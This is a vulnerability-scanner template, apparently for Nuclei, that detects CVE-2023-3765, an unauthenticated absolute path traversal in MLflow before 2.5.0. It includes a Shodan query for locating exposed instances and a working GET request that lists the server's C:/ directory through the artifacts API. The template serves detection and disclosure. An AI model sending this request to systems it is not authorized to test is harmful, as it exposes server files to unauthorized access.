id: CVE-2023-3765 info: name: MLflow Absolute Path Traversal author: DhiyaneshDK severity: critical description: | Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0. impact: | This vulnerability can lead to unauthorized access to sensitive information stored on the server. remediation: | Upgrade to a patched version of MLflow to mitigate the Absolute Path Traversal vulnerability. reference: - https://www.tenable.com/cve/CVE-2023-3765 - https://huntr.dev/bounties/4be5fd63-8a0a-490d-9ee1-f33dc768ed76 - https://nvd.nist.gov/vuln/detail/CVE-2023-3765 - https://github.com/mlflow/mlflow/commit/6dde93758d42455cb90ef324407919ed67668b9b classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2023-3765 cwe-id: CWE-36 epss-score: 0.00951 epss-percentile: 0.82826 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" tags: cve2023,cve,mflow,lfi,huntr,lfprojects http: - method: GET path: - "{{BaseURL}}/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/" matchers-condition: and matchers: - type: word words: - '"is_dir":' - '"path":' - '"files":' condition: and - type: word part: header words: - application/json - type: status status: - 200 # digest: 490a0046304402200a917400368cfdba77d790147d84d75dde69c698ea1f50eb87e2e46ef3802e6702204a6951c6f20cf4e0722ad2424746f227dd1fb1172fe5f7e624c00010f826aa2a:922c64590222798bb761d5b6d8e72950